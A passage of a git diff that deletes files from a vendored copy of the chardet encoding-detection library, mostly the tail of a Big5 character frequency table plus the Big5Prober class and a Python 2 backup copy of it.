-10096,10097,4476,10098,10099,10100,10101,10102,10103,10104,10105,10106,10107,10108,10109,10110, # 9936 -10111,2174,10112,10113,10114,10115,10116,10117,10118,10119,10120,10121,10122,10123,10124,10125, # 9952 -10126,10127,10128,10129,10130,10131,10132,10133,10134,10135,10136,10137,10138,10139,10140,3807, # 9968 -4186,4925,10141,10142,10143,10144,10145,10146,10147,4477,4187,10148,10149,10150,10151,10152, # 9984 -10153,4188,10154,10155,10156,10157,10158,10159,10160,10161,4926,10162,10163,10164,10165,10166, #10000 -10167,10168,10169,10170,10171,10172,10173,10174,10175,10176,10177,10178,10179,10180,10181,10182, #10016 -10183,10184,10185,10186,10187,10188,10189,10190,10191,10192,3203,10193,10194,10195,10196,10197, #10032 -10198,10199,10200,4478,10201,10202,10203,10204,4479,10205,10206,10207,10208,10209,10210,10211, #10048 -10212,10213,10214,10215,10216,10217,10218,10219,10220,10221,10222,10223,10224,10225,10226,10227, #10064 -10228,10229,10230,10231,10232,10233,10234,4927,10235,10236,10237,10238,10239,10240,10241,10242, #10080 -10243,10244,10245,10246,10247,10248,10249,10250,10251,10252,10253,10254,10255,10256,10257,10258, #10096 -10259,10260,10261,10262,10263,10264,10265,10266,10267,10268,10269,10270,10271,10272,10273,4480, #10112 -4928,4929,10274,10275,10276,10277,10278,10279,10280,10281,10282,10283,10284,10285,10286,10287, #10128 -10288,10289,10290,10291,10292,10293,10294,10295,10296,10297,10298,10299,10300,10301,10302,10303, #10144 -10304,10305,10306,10307,10308,10309,10310,10311,10312,10313,10314,10315,10316,10317,10318,10319, #10160 -10320,10321,10322,10323,10324,10325,10326,10327,10328,10329,10330,10331,10332,10333,10334,4930, #10176 -10335,10336,10337,10338,10339,10340,10341,10342,4931,10343,10344,10345,10346,10347,10348,10349, #10192 -10350,10351,10352,10353,10354,10355,3088,10356,2786,10357,10358,10359,10360,4189,10361,10362, #10208 -10363,10364,10365,10366,10367,10368,10369,10370,10371,10372,10373,10374,10375,4932,10376,10377, #10224 -10378,10379,10380,10381,10382,10383,10384,10385,10386,10387,10388,10389,10390,10391,10392,4933, #10240 -10393,10394,10395,4934,10396,10397,10398,10399,10400,10401,10402,10403,10404,10405,10406,10407, #10256 -10408,10409,10410,10411,10412,3446,10413,10414,10415,10416,10417,10418,10419,10420,10421,10422, #10272 -10423,4935,10424,10425,10426,10427,10428,10429,10430,4936,10431,10432,10433,10434,10435,10436, #10288 -10437,10438,10439,10440,10441,10442,10443,4937,10444,10445,10446,10447,4481,10448,10449,10450, #10304 -10451,10452,10453,10454,10455,10456,10457,10458,10459,10460,10461,10462,10463,10464,10465,10466, #10320 -10467,10468,10469,10470,10471,10472,10473,10474,10475,10476,10477,10478,10479,10480,10481,10482, #10336 -10483,10484,10485,10486,10487,10488,10489,10490,10491,10492,10493,10494,10495,10496,10497,10498, #10352 -10499,10500,10501,10502,10503,10504,10505,4938,10506,10507,10508,10509,10510,2552,10511,10512, #10368 -10513,10514,10515,10516,3447,10517,10518,10519,10520,10521,10522,10523,10524,10525,10526,10527, #10384 -10528,10529,10530,10531,10532,10533,10534,10535,10536,10537,10538,10539,10540,10541,10542,10543, #10400 -4482,10544,4939,10545,10546,10547,10548,10549,10550,10551,10552,10553,10554,10555,10556,10557, #10416 -10558,10559,10560,10561,10562,10563,10564,10565,10566,10567,3676,4483,10568,10569,10570,10571, #10432 -10572,3448,10573,10574,10575,10576,10577,10578,10579,10580,10581,10582,10583,10584,10585,10586, #10448 -10587,10588,10589,10590,10591,10592,10593,10594,10595,10596,10597,10598,10599,10600,10601,10602, #10464 -10603,10604,10605,10606,10607,10608,10609,10610,10611,10612,10613,10614,10615,10616,10617,10618, #10480 -10619,10620,10621,10622,10623,10624,10625,10626,10627,4484,10628,10629,10630,10631,10632,4940, #10496 -10633,10634,10635,10636,10637,10638,10639,10640,10641,10642,10643,10644,10645,10646,10647,10648, #10512 -10649,10650,10651,10652,10653,10654,10655,10656,4941,10657,10658,10659,2599,10660,10661,10662, #10528 -10663,10664,10665,10666,3089,10667,10668,10669,10670,10671,10672,10673,10674,10675,10676,10677, #10544 -10678,10679,10680,4942,10681,10682,10683,10684,10685,10686,10687,10688,10689,10690,10691,10692, #10560 -10693,10694,10695,10696,10697,4485,10698,10699,10700,10701,10702,10703,10704,4943,10705,3677, #10576 -10706,10707,10708,10709,10710,10711,10712,4944,10713,10714,10715,10716,10717,10718,10719,10720, #10592 -10721,10722,10723,10724,10725,10726,10727,10728,4945,10729,10730,10731,10732,10733,10734,10735, #10608 -10736,10737,10738,10739,10740,10741,10742,10743,10744,10745,10746,10747,10748,10749,10750,10751, #10624 -10752,10753,10754,10755,10756,10757,10758,10759,10760,10761,4946,10762,10763,10764,10765,10766, #10640 -10767,4947,4948,10768,10769,10770,10771,10772,10773,10774,10775,10776,10777,10778,10779,10780, #10656 -10781,10782,10783,10784,10785,10786,10787,10788,10789,10790,10791,10792,10793,10794,10795,10796, #10672 -10797,10798,10799,10800,10801,10802,10803,10804,10805,10806,10807,10808,10809,10810,10811,10812, #10688 -10813,10814,10815,10816,10817,10818,10819,10820,10821,10822,10823,10824,10825,10826,10827,10828, #10704 -10829,10830,10831,10832,10833,10834,10835,10836,10837,10838,10839,10840,10841,10842,10843,10844, #10720 -10845,10846,10847,10848,10849,10850,10851,10852,10853,10854,10855,10856,10857,10858,10859,10860, #10736 -10861,10862,10863,10864,10865,10866,10867,10868,10869,10870,10871,10872,10873,10874,10875,10876, #10752 -10877,10878,4486,10879,10880,10881,10882,10883,10884,10885,4949,10886,10887,10888,10889,10890, #10768 -10891,10892,10893,10894,10895,10896,10897,10898,10899,10900,10901,10902,10903,10904,10905,10906, #10784 -10907,10908,10909,10910,10911,10912,10913,10914,10915,10916,10917,10918,10919,4487,10920,10921, #10800 -10922,10923,10924,10925,10926,10927,10928,10929,10930,10931,10932,4950,10933,10934,10935,10936, #10816 -10937,10938,10939,10940,10941,10942,10943,10944,10945,10946,10947,10948,10949,4488,10950,10951, #10832 -10952,10953,10954,10955,10956,10957,10958,10959,4190,10960,10961,10962,10963,10964,10965,10966, #10848 -10967,10968,10969,10970,10971,10972,10973,10974,10975,10976,10977,10978,10979,10980,10981,10982, #10864 -10983,10984,10985,10986,10987,10988,10989,10990,10991,10992,10993,10994,10995,10996,10997,10998, #10880 -10999,11000,11001,11002,11003,11004,11005,11006,3960,11007,11008,11009,11010,11011,11012,11013, #10896 -11014,11015,11016,11017,11018,11019,11020,11021,11022,11023,11024,11025,11026,11027,11028,11029, #10912 -11030,11031,11032,4951,11033,11034,11035,11036,11037,11038,11039,11040,11041,11042,11043,11044, #10928 -11045,11046,11047,4489,11048,11049,11050,11051,4952,11052,11053,11054,11055,11056,11057,11058, #10944 -4953,11059,11060,11061,11062,11063,11064,11065,11066,11067,11068,11069,11070,11071,4954,11072, #10960 -11073,11074,11075,11076,11077,11078,11079,11080,11081,11082,11083,11084,11085,11086,11087,11088, #10976 -11089,11090,11091,11092,11093,11094,11095,11096,11097,11098,11099,11100,11101,11102,11103,11104, #10992 -11105,11106,11107,11108,11109,11110,11111,11112,11113,11114,11115,3808,11116,11117,11118,11119, #11008 -11120,11121,11122,11123,11124,11125,11126,11127,11128,11129,11130,11131,11132,11133,11134,4955, #11024 -11135,11136,11137,11138,11139,11140,11141,11142,11143,11144,11145,11146,11147,11148,11149,11150, #11040 -11151,11152,11153,11154,11155,11156,11157,11158,11159,11160,11161,4956,11162,11163,11164,11165, #11056 -11166,11167,11168,11169,11170,11171,11172,11173,11174,11175,11176,11177,11178,11179,11180,4957, #11072 -11181,11182,11183,11184,11185,11186,4958,11187,11188,11189,11190,11191,11192,11193,11194,11195, #11088 -11196,11197,11198,11199,11200,3678,11201,11202,11203,11204,11205,11206,4191,11207,11208,11209, #11104 -11210,11211,11212,11213,11214,11215,11216,11217,11218,11219,11220,11221,11222,11223,11224,11225, #11120 -11226,11227,11228,11229,11230,11231,11232,11233,11234,11235,11236,11237,11238,11239,11240,11241, #11136 -11242,11243,11244,11245,11246,11247,11248,11249,11250,11251,4959,11252,11253,11254,11255,11256, #11152 -11257,11258,11259,11260,11261,11262,11263,11264,11265,11266,11267,11268,11269,11270,11271,11272, #11168 -11273,11274,11275,11276,11277,11278,11279,11280,11281,11282,11283,11284,11285,11286,11287,11288, #11184 -11289,11290,11291,11292,11293,11294,11295,11296,11297,11298,11299,11300,11301,11302,11303,11304, #11200 -11305,11306,11307,11308,11309,11310,11311,11312,11313,11314,3679,11315,11316,11317,11318,4490, #11216 -11319,11320,11321,11322,11323,11324,11325,11326,11327,11328,11329,11330,11331,11332,11333,11334, #11232 -11335,11336,11337,11338,11339,11340,11341,11342,11343,11344,11345,11346,11347,4960,11348,11349, #11248 -11350,11351,11352,11353,11354,11355,11356,11357,11358,11359,11360,11361,11362,11363,11364,11365, #11264 -11366,11367,11368,11369,11370,11371,11372,11373,11374,11375,11376,11377,3961,4961,11378,11379, #11280 -11380,11381,11382,11383,11384,11385,11386,11387,11388,11389,11390,11391,11392,11393,11394,11395, #11296 -11396,11397,4192,11398,11399,11400,11401,11402,11403,11404,11405,11406,11407,11408,11409,11410, #11312 -11411,4962,11412,11413,11414,11415,11416,11417,11418,11419,11420,11421,11422,11423,11424,11425, #11328 -11426,11427,11428,11429,11430,11431,11432,11433,11434,11435,11436,11437,11438,11439,11440,11441, #11344 -11442,11443,11444,11445,11446,11447,11448,11449,11450,11451,11452,11453,11454,11455,11456,11457, #11360 -11458,11459,11460,11461,11462,11463,11464,11465,11466,11467,11468,11469,4963,11470,11471,4491, #11376 -11472,11473,11474,11475,4964,11476,11477,11478,11479,11480,11481,11482,11483,11484,11485,11486, #11392 -11487,11488,11489,11490,11491,11492,4965,11493,11494,11495,11496,11497,11498,11499,11500,11501, #11408 -11502,11503,11504,11505,11506,11507,11508,11509,11510,11511,11512,11513,11514,11515,11516,11517, #11424 -11518,11519,11520,11521,11522,11523,11524,11525,11526,11527,11528,11529,3962,11530,11531,11532, #11440 -11533,11534,11535,11536,11537,11538,11539,11540,11541,11542,11543,11544,11545,11546,11547,11548, #11456 -11549,11550,11551,11552,11553,11554,11555,11556,11557,11558,11559,11560,11561,11562,11563,11564, #11472 -4193,4194,11565,11566,11567,11568,11569,11570,11571,11572,11573,11574,11575,11576,11577,11578, #11488 -11579,11580,11581,11582,11583,11584,11585,11586,11587,11588,11589,11590,11591,4966,4195,11592, #11504 -11593,11594,11595,11596,11597,11598,11599,11600,11601,11602,11603,11604,3090,11605,11606,11607, #11520 -11608,11609,11610,4967,11611,11612,11613,11614,11615,11616,11617,11618,11619,11620,11621,11622, #11536 -11623,11624,11625,11626,11627,11628,11629,11630,11631,11632,11633,11634,11635,11636,11637,11638, #11552 -11639,11640,11641,11642,11643,11644,11645,11646,11647,11648,11649,11650,11651,11652,11653,11654, #11568 -11655,11656,11657,11658,11659,11660,11661,11662,11663,11664,11665,11666,11667,11668,11669,11670, #11584 -11671,11672,11673,11674,4968,11675,11676,11677,11678,11679,11680,11681,11682,11683,11684,11685, #11600 -11686,11687,11688,11689,11690,11691,11692,11693,3809,11694,11695,11696,11697,11698,11699,11700, #11616 -11701,11702,11703,11704,11705,11706,11707,11708,11709,11710,11711,11712,11713,11714,11715,11716, #11632 -11717,11718,3553,11719,11720,11721,11722,11723,11724,11725,11726,11727,11728,11729,11730,4969, #11648 -11731,11732,11733,11734,11735,11736,11737,11738,11739,11740,4492,11741,11742,11743,11744,11745, #11664 -11746,11747,11748,11749,11750,11751,11752,4970,11753,11754,11755,11756,11757,11758,11759,11760, #11680 -11761,11762,11763,11764,11765,11766,11767,11768,11769,11770,11771,11772,11773,11774,11775,11776, #11696 -11777,11778,11779,11780,11781,11782,11783,11784,11785,11786,11787,11788,11789,11790,4971,11791, #11712 -11792,11793,11794,11795,11796,11797,4972,11798,11799,11800,11801,11802,11803,11804,11805,11806, #11728 -11807,11808,11809,11810,4973,11811,11812,11813,11814,11815,11816,11817,11818,11819,11820,11821, #11744 -11822,11823,11824,11825,11826,11827,11828,11829,11830,11831,11832,11833,11834,3680,3810,11835, #11760 -11836,4974,11837,11838,11839,11840,11841,11842,11843,11844,11845,11846,11847,11848,11849,11850, #11776 -11851,11852,11853,11854,11855,11856,11857,11858,11859,11860,11861,11862,11863,11864,11865,11866, #11792 -11867,11868,11869,11870,11871,11872,11873,11874,11875,11876,11877,11878,11879,11880,11881,11882, #11808 -11883,11884,4493,11885,11886,11887,11888,11889,11890,11891,11892,11893,11894,11895,11896,11897, #11824 -11898,11899,11900,11901,11902,11903,11904,11905,11906,11907,11908,11909,11910,11911,11912,11913, #11840 -11914,11915,4975,11916,11917,11918,11919,11920,11921,11922,11923,11924,11925,11926,11927,11928, #11856 -11929,11930,11931,11932,11933,11934,11935,11936,11937,11938,11939,11940,11941,11942,11943,11944, #11872 -11945,11946,11947,11948,11949,4976,11950,11951,11952,11953,11954,11955,11956,11957,11958,11959, #11888 -11960,11961,11962,11963,11964,11965,11966,11967,11968,11969,11970,11971,11972,11973,11974,11975, #11904 -11976,11977,11978,11979,11980,11981,11982,11983,11984,11985,11986,11987,4196,11988,11989,11990, #11920 -11991,11992,4977,11993,11994,11995,11996,11997,11998,11999,12000,12001,12002,12003,12004,12005, #11936 -12006,12007,12008,12009,12010,12011,12012,12013,12014,12015,12016,12017,12018,12019,12020,12021, #11952 -12022,12023,12024,12025,12026,12027,12028,12029,12030,12031,12032,12033,12034,12035,12036,12037, #11968 -12038,12039,12040,12041,12042,12043,12044,12045,12046,12047,12048,12049,12050,12051,12052,12053, #11984 -12054,12055,12056,12057,12058,12059,12060,12061,4978,12062,12063,12064,12065,12066,12067,12068, #12000 -12069,12070,12071,12072,12073,12074,12075,12076,12077,12078,12079,12080,12081,12082,12083,12084, #12016 -12085,12086,12087,12088,12089,12090,12091,12092,12093,12094,12095,12096,12097,12098,12099,12100, #12032 -12101,12102,12103,12104,12105,12106,12107,12108,12109,12110,12111,12112,12113,12114,12115,12116, #12048 -12117,12118,12119,12120,12121,12122,12123,4979,12124,12125,12126,12127,12128,4197,12129,12130, #12064 -12131,12132,12133,12134,12135,12136,12137,12138,12139,12140,12141,12142,12143,12144,12145,12146, #12080 -12147,12148,12149,12150,12151,12152,12153,12154,4980,12155,12156,12157,12158,12159,12160,4494, #12096 -12161,12162,12163,12164,3811,12165,12166,12167,12168,12169,4495,12170,12171,4496,12172,12173, #12112 -12174,12175,12176,3812,12177,12178,12179,12180,12181,12182,12183,12184,12185,12186,12187,12188, #12128 -12189,12190,12191,12192,12193,12194,12195,12196,12197,12198,12199,12200,12201,12202,12203,12204, #12144 -12205,12206,12207,12208,12209,12210,12211,12212,12213,12214,12215,12216,12217,12218,12219,12220, #12160 -12221,4981,12222,12223,12224,12225,12226,12227,12228,12229,12230,12231,12232,12233,12234,12235, #12176 -4982,12236,12237,12238,12239,12240,12241,12242,12243,12244,12245,4983,12246,12247,12248,12249, #12192 -4984,12250,12251,12252,12253,12254,12255,12256,12257,12258,12259,12260,12261,12262,12263,12264, #12208 -4985,12265,4497,12266,12267,12268,12269,12270,12271,12272,12273,12274,12275,12276,12277,12278, #12224 -12279,12280,12281,12282,12283,12284,12285,12286,12287,4986,12288,12289,12290,12291,12292,12293, #12240 -12294,12295,12296,2473,12297,12298,12299,12300,12301,12302,12303,12304,12305,12306,12307,12308, #12256 -12309,12310,12311,12312,12313,12314,12315,12316,12317,12318,12319,3963,12320,12321,12322,12323, #12272 -12324,12325,12326,12327,12328,12329,12330,12331,12332,4987,12333,12334,12335,12336,12337,12338, #12288 -12339,12340,12341,12342,12343,12344,12345,12346,12347,12348,12349,12350,12351,12352,12353,12354, #12304 -12355,12356,12357,12358,12359,3964,12360,12361,12362,12363,12364,12365,12366,12367,12368,12369, #12320 -12370,3965,12371,12372,12373,12374,12375,12376,12377,12378,12379,12380,12381,12382,12383,12384, #12336 -12385,12386,12387,12388,12389,12390,12391,12392,12393,12394,12395,12396,12397,12398,12399,12400, #12352 -12401,12402,12403,12404,12405,12406,12407,12408,4988,12409,12410,12411,12412,12413,12414,12415, #12368 -12416,12417,12418,12419,12420,12421,12422,12423,12424,12425,12426,12427,12428,12429,12430,12431, #12384 -12432,12433,12434,12435,12436,12437,12438,3554,12439,12440,12441,12442,12443,12444,12445,12446, #12400 -12447,12448,12449,12450,12451,12452,12453,12454,12455,12456,12457,12458,12459,12460,12461,12462, #12416 -12463,12464,4989,12465,12466,12467,12468,12469,12470,12471,12472,12473,12474,12475,12476,12477, #12432 -12478,12479,12480,4990,12481,12482,12483,12484,12485,12486,12487,12488,12489,4498,12490,12491, #12448 -12492,12493,12494,12495,12496,12497,12498,12499,12500,12501,12502,12503,12504,12505,12506,12507, #12464 -12508,12509,12510,12511,12512,12513,12514,12515,12516,12517,12518,12519,12520,12521,12522,12523, #12480 -12524,12525,12526,12527,12528,12529,12530,12531,12532,12533,12534,12535,12536,12537,12538,12539, #12496 -12540,12541,12542,12543,12544,12545,12546,12547,12548,12549,12550,12551,4991,12552,12553,12554, #12512 -12555,12556,12557,12558,12559,12560,12561,12562,12563,12564,12565,12566,12567,12568,12569,12570, #12528 -12571,12572,12573,12574,12575,12576,12577,12578,3036,12579,12580,12581,12582,12583,3966,12584, #12544 -12585,12586,12587,12588,12589,12590,12591,12592,12593,12594,12595,12596,12597,12598,12599,12600, #12560 -12601,12602,12603,12604,12605,12606,12607,12608,12609,12610,12611,12612,12613,12614,12615,12616, #12576 -12617,12618,12619,12620,12621,12622,12623,12624,12625,12626,12627,12628,12629,12630,12631,12632, #12592 -12633,12634,12635,12636,12637,12638,12639,12640,12641,12642,12643,12644,12645,12646,4499,12647, #12608 -12648,12649,12650,12651,12652,12653,12654,12655,12656,12657,12658,12659,12660,12661,12662,12663, #12624 -12664,12665,12666,12667,12668,12669,12670,12671,12672,12673,12674,12675,12676,12677,12678,12679, #12640 -12680,12681,12682,12683,12684,12685,12686,12687,12688,12689,12690,12691,12692,12693,12694,12695, #12656 -12696,12697,12698,4992,12699,12700,12701,12702,12703,12704,12705,12706,12707,12708,12709,12710, #12672 -12711,12712,12713,12714,12715,12716,12717,12718,12719,12720,12721,12722,12723,12724,12725,12726, #12688 -12727,12728,12729,12730,12731,12732,12733,12734,12735,12736,12737,12738,12739,12740,12741,12742, #12704 -12743,12744,12745,12746,12747,12748,12749,12750,12751,12752,12753,12754,12755,12756,12757,12758, #12720 -12759,12760,12761,12762,12763,12764,12765,12766,12767,12768,12769,12770,12771,12772,12773,12774, #12736 -12775,12776,12777,12778,4993,2175,12779,12780,12781,12782,12783,12784,12785,12786,4500,12787, #12752 -12788,12789,12790,12791,12792,12793,12794,12795,12796,12797,12798,12799,12800,12801,12802,12803, #12768 -12804,12805,12806,12807,12808,12809,12810,12811,12812,12813,12814,12815,12816,12817,12818,12819, #12784 -12820,12821,12822,12823,12824,12825,12826,4198,3967,12827,12828,12829,12830,12831,12832,12833, #12800 -12834,12835,12836,12837,12838,12839,12840,12841,12842,12843,12844,12845,12846,12847,12848,12849, #12816 -12850,12851,12852,12853,12854,12855,12856,12857,12858,12859,12860,12861,4199,12862,12863,12864, #12832 -12865,12866,12867,12868,12869,12870,12871,12872,12873,12874,12875,12876,12877,12878,12879,12880, #12848 -12881,12882,12883,12884,12885,12886,12887,4501,12888,12889,12890,12891,12892,12893,12894,12895, #12864 -12896,12897,12898,12899,12900,12901,12902,12903,12904,12905,12906,12907,12908,12909,12910,12911, #12880 -12912,4994,12913,12914,12915,12916,12917,12918,12919,12920,12921,12922,12923,12924,12925,12926, #12896 -12927,12928,12929,12930,12931,12932,12933,12934,12935,12936,12937,12938,12939,12940,12941,12942, #12912 -12943,12944,12945,12946,12947,12948,12949,12950,12951,12952,12953,12954,12955,12956,1772,12957, #12928 -12958,12959,12960,12961,12962,12963,12964,12965,12966,12967,12968,12969,12970,12971,12972,12973, #12944 -12974,12975,12976,12977,12978,12979,12980,12981,12982,12983,12984,12985,12986,12987,12988,12989, #12960 -12990,12991,12992,12993,12994,12995,12996,12997,4502,12998,4503,12999,13000,13001,13002,13003, #12976 -4504,13004,13005,13006,13007,13008,13009,13010,13011,13012,13013,13014,13015,13016,13017,13018, #12992 -13019,13020,13021,13022,13023,13024,13025,13026,13027,13028,13029,3449,13030,13031,13032,13033, #13008 -13034,13035,13036,13037,13038,13039,13040,13041,13042,13043,13044,13045,13046,13047,13048,13049, #13024 -13050,13051,13052,13053,13054,13055,13056,13057,13058,13059,13060,13061,13062,13063,13064,13065, #13040 -13066,13067,13068,13069,13070,13071,13072,13073,13074,13075,13076,13077,13078,13079,13080,13081, #13056 -13082,13083,13084,13085,13086,13087,13088,13089,13090,13091,13092,13093,13094,13095,13096,13097, #13072 -13098,13099,13100,13101,13102,13103,13104,13105,13106,13107,13108,13109,13110,13111,13112,13113, #13088 -13114,13115,13116,13117,13118,3968,13119,4995,13120,13121,13122,13123,13124,13125,13126,13127, #13104 -4505,13128,13129,13130,13131,13132,13133,13134,4996,4506,13135,13136,13137,13138,13139,4997, #13120 -13140,13141,13142,13143,13144,13145,13146,13147,13148,13149,13150,13151,13152,13153,13154,13155, #13136 -13156,13157,13158,13159,4998,13160,13161,13162,13163,13164,13165,13166,13167,13168,13169,13170, #13152 -13171,13172,13173,13174,13175,13176,4999,13177,13178,13179,13180,13181,13182,13183,13184,13185, #13168 -13186,13187,13188,13189,13190,13191,13192,13193,13194,13195,13196,13197,13198,13199,13200,13201, #13184 -13202,13203,13204,13205,13206,5000,13207,13208,13209,13210,13211,13212,13213,13214,13215,13216, #13200 -13217,13218,13219,13220,13221,13222,13223,13224,13225,13226,13227,4200,5001,13228,13229,13230, #13216 -13231,13232,13233,13234,13235,13236,13237,13238,13239,13240,3969,13241,13242,13243,13244,3970, #13232 -13245,13246,13247,13248,13249,13250,13251,13252,13253,13254,13255,13256,13257,13258,13259,13260, #13248 -13261,13262,13263,13264,13265,13266,13267,13268,3450,13269,13270,13271,13272,13273,13274,13275, #13264 -13276,5002,13277,13278,13279,13280,13281,13282,13283,13284,13285,13286,13287,13288,13289,13290, #13280 -13291,13292,13293,13294,13295,13296,13297,13298,13299,13300,13301,13302,3813,13303,13304,13305, #13296 -13306,13307,13308,13309,13310,13311,13312,13313,13314,13315,13316,13317,13318,13319,13320,13321, #13312 -13322,13323,13324,13325,13326,13327,13328,4507,13329,13330,13331,13332,13333,13334,13335,13336, #13328 -13337,13338,13339,13340,13341,5003,13342,13343,13344,13345,13346,13347,13348,13349,13350,13351, #13344 -13352,13353,13354,13355,13356,13357,13358,13359,13360,13361,13362,13363,13364,13365,13366,13367, #13360 -5004,13368,13369,13370,13371,13372,13373,13374,13375,13376,13377,13378,13379,13380,13381,13382, #13376 -13383,13384,13385,13386,13387,13388,13389,13390,13391,13392,13393,13394,13395,13396,13397,13398, #13392 -13399,13400,13401,13402,13403,13404,13405,13406,13407,13408,13409,13410,13411,13412,13413,13414, #13408 -13415,13416,13417,13418,13419,13420,13421,13422,13423,13424,13425,13426,13427,13428,13429,13430, #13424 -13431,13432,4508,13433,13434,13435,4201,13436,13437,13438,13439,13440,13441,13442,13443,13444, #13440 -13445,13446,13447,13448,13449,13450,13451,13452,13453,13454,13455,13456,13457,5005,13458,13459, #13456 -13460,13461,13462,13463,13464,13465,13466,13467,13468,13469,13470,4509,13471,13472,13473,13474, #13472 -13475,13476,13477,13478,13479,13480,13481,13482,13483,13484,13485,13486,13487,13488,13489,13490, #13488 -13491,13492,13493,13494,13495,13496,13497,13498,13499,13500,13501,13502,13503,13504,13505,13506, #13504 -13507,13508,13509,13510,13511,13512,13513,13514,13515,13516,13517,13518,13519,13520,13521,13522, #13520 -13523,13524,13525,13526,13527,13528,13529,13530,13531,13532,13533,13534,13535,13536,13537,13538, #13536 -13539,13540,13541,13542,13543,13544,13545,13546,13547,13548,13549,13550,13551,13552,13553,13554, #13552 -13555,13556,13557,13558,13559,13560,13561,13562,13563,13564,13565,13566,13567,13568,13569,13570, #13568 -13571,13572,13573,13574,13575,13576,13577,13578,13579,13580,13581,13582,13583,13584,13585,13586, #13584 -13587,13588,13589,13590,13591,13592,13593,13594,13595,13596,13597,13598,13599,13600,13601,13602, #13600 -13603,13604,13605,13606,13607,13608,13609,13610,13611,13612,13613,13614,13615,13616,13617,13618, #13616 -13619,13620,13621,13622,13623,13624,13625,13626,13627,13628,13629,13630,13631,13632,13633,13634, #13632 -13635,13636,13637,13638,13639,13640,13641,13642,5006,13643,13644,13645,13646,13647,13648,13649, #13648 -13650,13651,5007,13652,13653,13654,13655,13656,13657,13658,13659,13660,13661,13662,13663,13664, #13664 -13665,13666,13667,13668,13669,13670,13671,13672,13673,13674,13675,13676,13677,13678,13679,13680, #13680 -13681,13682,13683,13684,13685,13686,13687,13688,13689,13690,13691,13692,13693,13694,13695,13696, #13696 -13697,13698,13699,13700,13701,13702,13703,13704,13705,13706,13707,13708,13709,13710,13711,13712, #13712 -13713,13714,13715,13716,13717,13718,13719,13720,13721,13722,13723,13724,13725,13726,13727,13728, #13728 -13729,13730,13731,13732,13733,13734,13735,13736,13737,13738,13739,13740,13741,13742,13743,13744, #13744 -13745,13746,13747,13748,13749,13750,13751,13752,13753,13754,13755,13756,13757,13758,13759,13760, #13760 -13761,13762,13763,13764,13765,13766,13767,13768,13769,13770,13771,13772,13773,13774,3273,13775, #13776 -13776,13777,13778,13779,13780,13781,13782,13783,13784,13785,13786,13787,13788,13789,13790,13791, #13792 -13792,13793,13794,13795,13796,13797,13798,13799,13800,13801,13802,13803,13804,13805,13806,13807, #13808 -13808,13809,13810,13811,13812,13813,13814,13815,13816,13817,13818,13819,13820,13821,13822,13823, #13824 -13824,13825,13826,13827,13828,13829,13830,13831,13832,13833,13834,13835,13836,13837,13838,13839, #13840 -13840,13841,13842,13843,13844,13845,13846,13847,13848,13849,13850,13851,13852,13853,13854,13855, #13856 -13856,13857,13858,13859,13860,13861,13862,13863,13864,13865,13866,13867,13868,13869,13870,13871, #13872 -13872,13873,13874,13875,13876,13877,13878,13879,13880,13881,13882,13883,13884,13885,13886,13887, #13888 -13888,13889,13890,13891,13892,13893,13894,13895,13896,13897,13898,13899,13900,13901,13902,13903, #13904 -13904,13905,13906,13907,13908,13909,13910,13911,13912,13913,13914,13915,13916,13917,13918,13919, #13920 -13920,13921,13922,13923,13924,13925,13926,13927,13928,13929,13930,13931,13932,13933,13934,13935, #13936 -13936,13937,13938,13939,13940,13941,13942,13943,13944,13945,13946,13947,13948,13949,13950,13951, #13952 -13952,13953,13954,13955,13956,13957,13958,13959,13960,13961,13962,13963,13964,13965,13966,13967, #13968 -13968,13969,13970,13971,13972) #13973 diff --git a/chardet/chardet/big5freq.pyc b/chardet/chardet/big5freq.pyc deleted file mode 100644 index 6f6a6af..0000000 Binary files a/chardet/chardet/big5freq.pyc and /dev/null differ diff --git a/chardet/chardet/big5prober.py b/chardet/chardet/big5prober.py deleted file mode 100644 index d5b317d..0000000 --- a/chardet/chardet/big5prober.py +++ /dev/null @@ -1,41 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from .mbcharsetprober import MultiByteCharSetProber -from .codingstatemachine import CodingStateMachine -from .chardistribution import Big5DistributionAnalysis -from .mbcssm import Big5SMModel - -class Big5Prober(MultiByteCharSetProber): - def __init__(self): - MultiByteCharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(Big5SMModel) - self._mDistributionAnalyzer = Big5DistributionAnalysis() - self.reset() - - def get_charset_name(self): - return "Big5" diff --git a/chardet/chardet/big5prober.py.bak b/chardet/chardet/big5prober.py.bak deleted file mode 100644 index e6b52aa..0000000 --- a/chardet/chardet/big5prober.py.bak +++ /dev/null @@ -1,41 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import Big5DistributionAnalysis -from mbcssm import Big5SMModel - -class Big5Prober(MultiByteCharSetProber): - def __init__(self): - MultiByteCharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(Big5SMModel) - self._mDistributionAnalyzer = Big5DistributionAnalysis() - 